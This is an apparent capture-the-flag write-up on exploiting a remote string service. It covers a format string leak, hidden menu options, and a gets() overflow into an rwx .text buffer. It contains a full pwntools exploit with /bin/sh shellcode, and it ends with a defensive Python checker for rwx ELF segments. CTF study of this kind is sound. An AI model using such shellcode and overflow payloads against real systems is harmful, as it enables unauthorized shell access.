Untitled

a guest
Jul 22nd, 2018
First we have just a URL and a port, with no binary. The service has three options: StrLen, which takes a string and returns its length (obviously); SubStrRemove, which is not implemented; and finally StrRemoveLastSymbols, which takes a string and then a number (call it n) and removes the last n characters from the string.

StrRemoveLastSymbols has a format string vulnerability, which I used to dump important parts of the binary (like ESPR in the 33c3 CTF: https://www.youtube.com/watch?v=XuzuFUGuQv0).

If you open the dumped binary, it has no section headers, so it is not executable, but you can still see the disassembly. In the main function there is a switch which checks for '1', '2', '3', 'T', 'X' and 'S'. The first three are the options already mentioned above, but there are three secret options here (T, X and S): S prints 'It's strange' and then segfaults; X asks you 'Are you surprised?? (y or n)' and then prints some text depending on your answer; finally T asks you the same as X, but if you answer 'y' it prints a link to download the binary and its libc. Now you can download them and write the exploit.

But where is the vulnerability? Even though we have a format string, there is another vulnerability that is easier to exploit. Remember the 'Are you surprised?? (y or n)' prompt: it is not a getchar, it is a gets into a buffer located in the .text section. You know what that means? The .text section is rwx, so we can overwrite something important above the buffer to redirect code execution into the same buffer using shellcode. I tested with pattern_create in peda using the 'X' option in the binary: it segfaults at offset 256, but the input has to start with a 'y' character, so this is my exploit:

#!/usr/bin/env python2
from pwn import *

def recvlines(lnum):
    # read lnum lines from the service and return them concatenated
    global p
    res = ""
    for x in range(lnum):
        res += p.recvline()
    return res

host = "pwn-03.v7frkwrfyhsjtbpfcppnu.ctfz.one"
port = 1234

base_buf = 0x80492e0
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# 'y' answers the prompt, the shellcode follows it, NOPs pad the input out to the
# 256-byte offset found with pattern_create, and the value above the buffer is
# overwritten with base_buf+1 (the address just past the 'y', i.e. the shellcode)
payload = ("y" + shellcode).ljust(256, "\x90") + p32(base_buf + 1)
p = remote(host, port)
#p = process("./babypwn")
print recvlines(4)
p.sendline("X")
print recvlines(3)
p.sendline(payload)
p.interactive()

Now, after getting a shell, we just have to cat the flag.
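The property the writeup leans on is a loadable segment mapped both writable and executable. As an added example (Python 3, not part of the paste and not the CTF binary), here is a stdlib-only check that parses ELF program headers and reports any PT_LOAD segment that is W+X, plus whether the stack is marked executable; the sample image is constructed inline, with its code segment on the page that contains the writeup's buffer address 0x80492e0.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474e551
PF_X, PF_W, PF_R = 1, 2, 4

def program_headers(data):
    """Yield (p_type, p_flags, p_vaddr, p_memsz) for each program header of a
    little-endian ELF32/ELF64 image (field layouts per the System V ABI)."""
    if data[:4] != b"\x7fELF" or data[5] != 1:
        raise ValueError("expected a little-endian ELF image")
    if data[4] == 1:    # ELFCLASS32: Ehdr is 52 bytes, Phdr is 32 bytes
        (phoff,) = struct.unpack_from("<I", data, 28)
        phentsize, phnum = struct.unpack_from("<HH", data, 42)
        fmt = "<IIIIIIII"  # type, offset, vaddr, paddr, filesz, memsz, flags, align
        pick = lambda f: (f[0], f[6], f[2], f[5])
    elif data[4] == 2:  # ELFCLASS64: Ehdr is 64 bytes, Phdr is 56 bytes
        (phoff,) = struct.unpack_from("<Q", data, 32)
        phentsize, phnum = struct.unpack_from("<HH", data, 54)
        fmt = "<IIQQQQQQ"  # type, flags, offset, vaddr, paddr, filesz, memsz, align
        pick = lambda f: (f[0], f[1], f[3], f[6])
    else:
        raise ValueError("unknown ELF class")
    for i in range(phnum):
        yield pick(struct.unpack_from(fmt, data, phoff + i * phentsize))

def perm_string(flags):
    return "".join(c if flags & b else "-" for c, b in (("r", PF_R), ("w", PF_W), ("x", PF_X)))

def rwx_segments(data):
    """(vaddr, memsz, perms) of every PT_LOAD that is both writable and
    executable: the condition that made the writeup's .text buffer a target."""
    return [(va, sz, perm_string(fl)) for t, fl, va, sz in program_headers(data)
            if t == PT_LOAD and fl & PF_W and fl & PF_X]

def executable_stack(data):
    """True when there is no PT_GNU_STACK header or it carries PF_X."""
    st = [fl for t, fl, _, _ in program_headers(data) if t == PT_GNU_STACK]
    return not st or bool(st[0] & PF_X)

def constructed_elf32():
    """Constructed sample, not the CTF binary: one rwx code segment on the
    0x8049000 page, one rw data segment, and no PT_GNU_STACK header."""
    ehdr = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)
    ehdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8049000, 52, 0, 0, 52, 32, 2, 0, 0, 0)
    code = struct.pack("<IIIIIIII", PT_LOAD, 0, 0x8049000, 0x8049000, 0x1000, 0x1000, PF_R | PF_W | PF_X, 0x1000)
    data = struct.pack("<IIIIIIII", PT_LOAD, 0x1000, 0x804a000, 0x804a000, 0x100, 0x100, PF_R | PF_W, 0x1000)
    return ehdr + code + data

if __name__ == "__main__":
    print(rwx_segments(constructed_elf32()), executable_stack(constructed_elf32()))
```

Run it against a real file with `rwx_segments(open(path, "rb").read())`; an empty list and a False stack result is what a hardened build should give.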